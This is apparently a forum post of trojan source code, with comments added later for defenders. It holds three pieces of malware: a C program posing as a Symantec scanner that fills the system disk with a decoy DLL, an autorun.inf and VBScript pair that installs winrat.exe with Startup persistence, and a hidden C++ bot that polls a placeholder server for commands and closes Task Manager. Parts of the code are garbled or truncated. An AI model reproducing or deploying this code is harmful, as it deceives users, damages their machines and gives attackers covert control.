Zaraky

Trojan[C++]


#include<stdio.h>
#include<conio.h>
#include<dos.h>
#include<stdlib.h>
/* File-scope state shared by every function in this listing. */
/* t: probe handle for <drive>:\windows\explorer.exe; a: existence check for spceshot.dll; b: output file opened "wb+" in findroot(). */
FILE *a,*t,*b;
/* r: pass counter in eatspace(); status: last fputs() result; vir_count: random number printed as the fake "eliminated" total. */
int r,status,vir_count;
/* Inner loop counter in eatspace(); note it is declared double, not an integer type. */
double i;
/* ch: filler text handed to fputs() in eatspace(); choice: key read by accept(). */
char ch[]="CREATION OF A SPECIAL FILE FOR SPACE OCCUPYING HARDDISK",choice;

/* Forward declarations; the definitions follow main(). */
void eatspace(void);
void findroot(void);
void showstatus(void);
void draw(void);
void accept(void);

/*
 * Entry point. Draws the banner, shows the consent prompt (accept() exits
 * unless ENTER is pressed), then shows an "analysis" message and hands off
 * to findroot().
 * Defender note: no analysis is performed between the messages below; the
 * sleep(3)/getch() sequence only stages the decoy scanner screen.
 */
void main()
{
draw();
accept();
textcolor(WHITE);
draw();
gotoxy(12,8);
cputs("ANALYSIS OF THE SYSTEM. PLEASE WAIT ...");
sleep(3);
gotoxy(12,8);
delline();
cputs("ANALYSIS OF THE SYSTEM. PLEASE WAIT ...");
/* Blocks until a key is pressed before the file-system probing starts. */
getch();
gotoxy(12,8);
delline();
/* findroot() ends in exit() on every path, so control does not come back here. */
findroot();
}

/*
 * Consent prompt. Prints a disclosure text in light red and continues only
 * when the key read by getch() is 13 (ENTER); any other key calls exit(0).
 * Defender note: the prompt text itself names the artifact to remove
 * ("spceshot.dll" under "%windir%\\System32") as the way to undo the effect.
 * NOTE(review): the string literal passed to cputs() is garbled and
 * unterminated as posted (it spans two lines and has no closing quote or
 * parenthesis), so this block does not compile as shown.
 */
void accept()
{
textcolor(LIGHTRED);
gotoxy(1,8);
cputs("This program is a Trojan horse SIMPLE DEMO. If you run this program it will \ n \ REAT your space FULL ON HARD DISK DRIVE ROOT. HOWEVER AND 'POSSIBLE
\n\rEELIMINATE THE DANNOE.\n\n\rTo fix the damage that 'VE \ TO DELETE THE FILES \"spceshot.dll\" LOCATED IN\n\n\r \"%windir%\\System32\".\n\n\rSE you want to run the program, press ENTER, otherwise press any key to exit

if((choice=getch())!=13)
exit(0);
}

/*
 * Clears the screen and draws a text-mode frame of asterisks with a title
 * line inside it.
 * Defender note: the title string imitates a security-vendor scanner; the
 * program contains no scanning logic, so the banner is purely a lure.
 */
void draw()
{
clrscr();
textcolor(WHITE);
/* Top and bottom border rows. */
gotoxy(12,2);
cputs("********************************************************");
gotoxy(12,6);
cputs("********************************************************");
/* Left and right border columns: '*', line feed, backspace, repeated three times. */
gotoxy(12,3);
cputs("*\n\b*\n\b*\n\b");
gotoxy(67,3);
cputs("*\n\b*\n\b*\n\b");
/* Title text placed inside the frame. */
gotoxy(14,4);
cputs("SSYMANTEC SECURITY SCAN - 2009 (RAPID SCANNER SYSTEM)");
}

/*
 * Probes drives C:, D:, E: and F: in turn for a Windows directory and, on
 * the first one where the output file can be created, starts the write loop.
 *
 * Per drive:
 *   1. Open <drive>:\windows\explorer.exe read-only as a presence test.
 *   2. If <drive>:\windows\system32\spceshot.dll already exists, print a
 *      "stopped" message and exit(1); the file doubles as a "ran before"
 *      marker.
 *   3. Otherwise open that path with "wb+" into the global b and call
 *      showstatus() and eatspace(); eatspace() ends in exit(0).
 *
 * Defender note: the only on-disk artifact created here is
 * <drive>:\windows\system32\spceshot.dll. It is not a real DLL; its content
 * is presumably the repeated filler string ch (the fputs() call in
 * eatspace() is truncated as posted). Deleting the file reclaims the space,
 * as the program's own prompt states.
 */
void findroot()
{
/* Drive C: */
t=fopen("C:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
textcolor(WHITE);
/* Existence check only; the handle a is never closed on this path. */
a=fopen("C:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN is stopped. TRY AGAIN LATER!");
getch();
exit(1);
}
/* "wb+" creates the file (or truncates it) for writing. */
b=fopen("C:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
/* Reached only when the file could not be created; falls through to the next drive. */
}
/* Drive D: same sequence as above. */
t=fopen("D:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("D:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN is stopped. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("D:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
/* Drive E: same sequence as above. */
t=fopen("E:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("E:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN is stopped. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("E:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
/* Drive F: same sequence as above. */
t=fopen("F:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("F:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN is stopped. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("F:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
/* t holds only the result of the last probe (F:), so this message reflects that drive alone. */
if(t==NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SCAN SYSTEM FAILED! Press any key to exit the program.");
getch();
exit(1);
}
exit(1);
}

/*
 * Write loop. Repeatedly calls fputs() with the filler string ch until the
 * call returns EOF, then prints a fake "scan complete" summary and exits.
 *
 * Structure: an endless while loop around three passes (r = 1..3), each of
 * which attempts 899,999 writes and then prints one '.' as a progress dot.
 * fputs() returning EOF signals a write error; here that is presumably the
 * disk-full condition the program is built to reach.
 *
 * Defender note: the "detected and eliminated" figure is random(120), i.e.
 * an invented number, not a count of anything. The observable effect is
 * free space on the system drive shrinking while the decoy screen is shown.
 * NOTE(review): the fputs() call is truncated as posted (its second
 * argument is missing), so this block does not compile as shown.
 */
void eatspace()
{
textcolor(LIGHTRED);
gotoxy(12,16);
cputs("NOTICE: Do not abort the scanning process to completion!\n");
textcolor(WHITE);
gotoxy(12,18);
while(1)
{
for(r=1;r<4;r++)
{
for(i=1;i<900000;i++)
{
status=fputs(ch,;
if(status==EOF)
{
/* Write failed: redraw the banner and show the made-up result. */
textcolor(WHITE);
vir_count=random(120);
draw();
gotoxy(12,8);
cprintf("Scanning complete!. Detected and eliminated MINACCE d su%d",vir_count);
gotoxy(12,10);
cprintf("Press any key to CLOSE...");
getch();
break;
}
}
/* One progress dot per pass; printed even on the pass that hit EOF. */
cputs(".");
/* The same EOF test is repeated to unwind each enclosing loop. */
if(status==EOF) break;
}
if(status==EOF) break;
}
/* The output file handle is never closed explicitly; the process just exits. */
exit(0);
}

/*
 * Prints three fixed status lines at rows 8, 10 and 13 of the screen.
 * Called from findroot() immediately before eatspace(); the text presents
 * the write loop that follows as a system scan.
 */
void showstatus()
{
gotoxy(12,8);
cputs("Scan your system for threats");
gotoxy(12,10);
cputs("This can take up FEW MINUTES FOR A FEW HOURS");
gotoxy(12,13);
cputs("SCAN IN PROGRESS. WAIT...");
}

or

-Open Notepad (autorun.inf)

[AutoRun]
open=wscript go.vbs

go.vbs

' go.vbs: launched by the autorun.inf entry "open=wscript go.vbs".
' What it does, in order:
'   1. If C:\Windows\trojan already exists, move it aside to
'      C:\Windows\trojanbackup<day-of-year>, the day taken from winrat.exe's
'      last-modified date.
'   2. Copy the .\trojan folder next to the script to C:\Windows\trojan.
'   3. Run C:\Windows\trojan\winrat.exe.
'   4. Copy Trojan.lnk into the All Users Startup folder unless it is there already.
' Defender note: artifacts to look for are the C:\Windows\trojan and
' C:\Windows\trojanbackup* folders, winrat.exe, Trojan.lnk in the All Users
' Startup folder, and wscript.exe started from removable media. The
' "Documents and Settings" path is the Windows XP-era profile layout.
' Disabling AutoRun for removable drives stops the autorun.inf entry from firing.
Dim FSO,File
' NOTE(review): Date, Hour and Day are also names of VBScript built-in functions; Hour is never used below.
Dim Date,Hour,Day,Backuppath,Daystring
Set FSO = CreateObject("Scripting.FileSystemObject")
' Step 1: an earlier copy exists, so move it to a backup folder named by day of year.
If Fso.FolderExists ("C:\Windows\trojan") Then
Set File= FSO.GetFile("C:\Windows\trojan\winrat.exe")
Date=File.DateLastModified
' "y" is the DatePart interval for day of year.
Day=DatePart("y",Date)
Daystring=CStr(Day)
Backuppath="C:\Windows\trojanbackup"+Daystring
Fso.MoveFolder "C:\Windows\trojan", Backuppath
End If
' Step 2: copy the payload folder from the current directory; the last argument (true) allows overwriting.
FSO.CopyFolder ".\trojan", "c:\Windows\trojan", true
' Step 3: start the copied executable.
Set oShell = CreateObject("WScript.Shell")
oShell.Run "C:\Windows\trojan\winrat.exe"
' Step 4: persistence. A shortcut in the All Users Startup folder runs at every logon.
If Fso.FolderExists ("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\") Then
If Fso.FileExists ("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Trojan.lnk") Then
Else
FSO.CopyFile "c:\Windows\trojan\Trojan.lnk","C:\Documents and Settings\All Users\Start Menu\Programs\Startup\", true
End If
End If

wscript.quit

or

001	#include <windows.h>
002 #pragma comment(lib, "Winmm.lib")
003 #include <urlmon.h>
004 #pragma comment(lib, "urlmon.lib")
005 #include <iostream>
006 #include <fstream>
007 #include <WinInet.h>
008 #pragma comment(lib, "WinInet.lib")
009 #include <ShlObj.h>
010 using namespace std;
011
012 int Option, Assign, Target;
013 DWORD WINAPI LowProfile(LPVOID);
014 DWORD WINAPI Option1(LPVOID);
015 DWORD WINAPI Option2(LPVOID);
016 DWORD WINAPI Option3(LPVOID);
017 DWORD WINAPI Option4(LPVOID);
018 DWORD WINAPI Option5(LPVOID);
019 // Add more lines of Option6, Option7, etc. to create more commands.
020 HWND TaskMgr, SysError, WMP, Disk1, Disk2, Disk3, Disk4, Autoplay, VBS;
021
022 int main() {
023 // Detach from the console so the process shows no window.
024 FreeConsole();
025
026 CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&LowProfile, 0, 0, NULL);
027
028 // First run only: if assign.txt is absent it is fetched over plain HTTP; the integer in it becomes this host's ID (Assign). The author notes the served value can be changed on the server beforehand. Defender note: unauthenticated HTTP, so the ID and later commands are readable in transit.
029 FILE *istream;
030 if ( (istream = fopen ( "C:\\Windows\\trojan\\assign.txt", "r" ) ) == NULL ) {
031 URLDownloadToFile(NULL, L"http://www.yourwebsitehere.com/trojan/assign.html", L"c:\\Windows\\trojan\\assign.txt", NULL, NULL);
032 } else {
033 }
034
035 // Parse the ID from assign.txt into the global Assign; nothing checks that the open or the read succeeded.
036 ifstream inAssign;
037 inAssign.clear();
038 inAssign.open("c:\\Windows\\trojan\\assign.txt");
039 inAssign >> Assign;
040 inAssign.close();
041 inAssign.clear();
042
043 // Polling loop: one round roughly every 5 s (Sleep(5000) at the bottom). Defender note: fixed-interval HTTP requests to a single host are a beaconing pattern that shows up in proxy and DNS logs.
044 while(1) {
045
046 // Remove the previous option/target files and their URL cache entries so each round fetches fresh content, then download both files again.
047 remove("c:\\Windows\\trojan\\option.txt");
048 remove("c:\\Windows\\trojan\\target.txt");
049 DeleteUrlCacheEntry(L"http://www.yourwebsitehere.com/trojan/");
050 DeleteUrlCacheEntry(L"http://www.yourwebsitehere.com/trojan/target.html");
051 Sleep(100);
052 URLDownloadToFile(NULL, L"http://www.yourwebsitehere.com/trojan/", L"c:\\Windows\\trojan\\option.txt", NULL, NULL);
053 URLDownloadToFile(NULL, L"http://www.yourwebsitehere.com/trojan/target.html", L"c:\\Windows\\trojan\\target.txt", NULL, NULL);
054
055 // Read the command number (an integer) from option.txt into the global Option.
056 ifstream inFile;
057 inFile.clear();
058 inFile.open("c:\\Windows\\trojan\\option.txt");
059 inFile >> Option;
060 inFile.close();
061 inFile.clear();
062
063 // Read the addressed host ID (an integer) from target.txt into the global Target.
064 ifstream inTarget;
065 inTarget.clear();
066 inTarget.open("c:\\Windows\\trojan\\target.txt");
067 inTarget >> Target;
068 inTarget.close();
069 inTarget.clear();
070
071 // Act only when Target equals this host's ID, or when Target is 0 (addressed to every host).
072 if(Target == Assign || Target == 0) {
073 if(Option == 1) { CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&Option1, 0, 0, NULL); }
074 else if(Option == 2) { CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&Option2, 0, 0, NULL); }
075 else if(Option == 3) { CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&Option3, 0, 0, NULL); }
076 else if(Option == 4) { CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&Option4, 0, 0, NULL); }
077 else if(Option == 5) { CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&Option5, 0, 0, NULL); }
078 // Option values other than 1-5 are ignored in this listing.
079 }
080 Sleep(5000);
081 }
082 }
083
084 // LowProfile thread: every 500 ms it looks up top-level windows by exact title and posts WM_CLOSE to each one found. Defender note: Task Manager or AutoPlay windows that close by themselves right after opening are a user-visible symptom of this loop.
085 DWORD WINAPI LowProfile(LPVOID) {
086 while(1) {
087 // Task Manager; when found it is retitled and closed 500 ms later (see the first if-block below).
088 TaskMgr = FindWindow(NULL,L"Windows Task Manager");
089 // Dialog that, per the author, may appear when new hardware (the U3 drive) is installed.
090 SysError = FindWindow(NULL,L"System Settings Change");
091 // Windows Media Player, which the author reports occasionally opening on insertion.
092 WMP = FindWindow(NULL,L"Windows Media Player");
093 // Explorer windows for the removable-disk volume, matched for drive letters D: to G: only.
094 Disk1 = FindWindow(NULL,L"(D:) Removable Disk");
095 Disk2 = FindWindow(NULL,L"(E:) Removable Disk");
096 Disk3 = FindWindow(NULL,L"(F:) Removable Disk");
097 Disk4 = FindWindow(NULL,L"(G:) Removable Disk");
098 // The AutoPlay prompt.
099 Autoplay = FindWindow(NULL,L"Autoplay");
100 // Windows Script Host error dialogs raised by go.vbs.
101 VBS = FindWindow(NULL,L"Windows Script Host");
102 if( TaskMgr != NULL) {
103 SetWindowText( TaskMgr,L"DIE!!!! =O");
104 Sleep(500);
105 PostMessage( TaskMgr, WM_CLOSE, (LPARAM)0, (WPARAM)0);
106 }
107 if( SysError != NULL) {
108 PostMessage( SysError, WM_CLOSE, (LPARAM)0, (WPARAM)0);
109 }
110 if( WMP != NULL) {
111 Sleep(1000);
112 PostMessage( WMP, WM_CLOSE, (LPARAM)0, (WPARAM)0);
113 }
114 if( Disk1 != NULL) {
115 PostMessage( Disk1, WM_CLOSE, (LPARAM)0, (WPARAM)0);
116 }
117 if( Disk2 != NULL) {
118 PostMessage( Disk2, WM_CLOSE, (LPARAM)0, (WPARAM)0);
119 }
120 if( Disk3 != NULL) {
121 PostMessage( Disk3, WM_CLOSE, (LPARAM)0, (WPARAM)0);
122 }
123 if( Disk4 != NULL) {
124 PostMessage( Disk4, WM_CLOSE, (LPARAM)0, (WPARAM)0);
125 }
126 if( Autoplay != NULL) {
127 PostMessage( Autoplay, WM_CLOSE, (LPARAM)0, (WPARAM)0);
128 }
129 if( VBS != NULL) {
130 PostMessage( VBS, WM_CLOSE, (LPARAM)0, (WPARAM)0);
131 }
132 Sleep(500);
133 }
134 }
135
136 //
137 // Command handlers: main() starts one of these as a thread when the downloaded Option value is 1-5.
138 // In this listing every handler is an empty stub that returns 0; the author notes that further handlers need a matching declaration and dispatch line.
139 // Defender note: in a populated sample the actual behaviour would live in these thread routines, so they are where analysis should concentrate.
140 //
141
142 DWORD WINAPI Option1(LPVOID) { // handler for Option == 1 (empty stub)
143 return 0;
144 }
145
146 DWORD WINAPI Option2(LPVOID) { // handler for Option == 2 (empty stub)
147 return 0;
148 }
149
150 DWORD WINAPI Option3(LPVOID) { // handler for Option == 3 (empty stub)
151 return 0;
152 }
153
154 DWORD WINAPI Option4(LPVOID) { // handler for Option == 4 (empty stub)
155 return 0;
156 }
157
158 DWORD WINAPI Option5(LPVOID) { // handler for Option == 5 (empty stub)
159 return 0;
160 }

Edited by Zaraky